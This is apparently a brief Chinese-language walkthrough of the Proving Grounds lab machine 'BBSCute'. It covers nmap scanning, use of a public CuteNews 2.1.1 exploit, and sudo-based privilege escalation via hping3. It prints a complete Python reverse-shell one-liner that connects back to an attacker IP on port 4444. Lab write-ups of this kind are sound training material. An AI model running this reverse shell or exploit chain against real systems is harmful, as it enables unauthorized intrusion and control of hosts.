nmap -Pn -p- -T4 --min-rate=1000 192.168.58.128
nmap -Pn -p 22,80,88,110,995 -sCV 192.168.58.128
80端口是Debian的默认页面,尝试对路径进行爆破。
得到登录页面,使用了“CuteNews 2.1.1”
在exploit-db中搜索“CuteNews”
https://www.exploit-db.com/exploits/48800
直接下载脚本使用
使用过程出现错误
看一下源码,需要把/CuteNews路径删除
反弹shell
python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.58.200”,4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(“/bin/sh”)’
使用sudo -l,发现可以提权
https://gtfobins.github.io/gtfobins/hping3/
PG::BBSCute
最新推荐文章于 2023-07-23 01:36:20 发布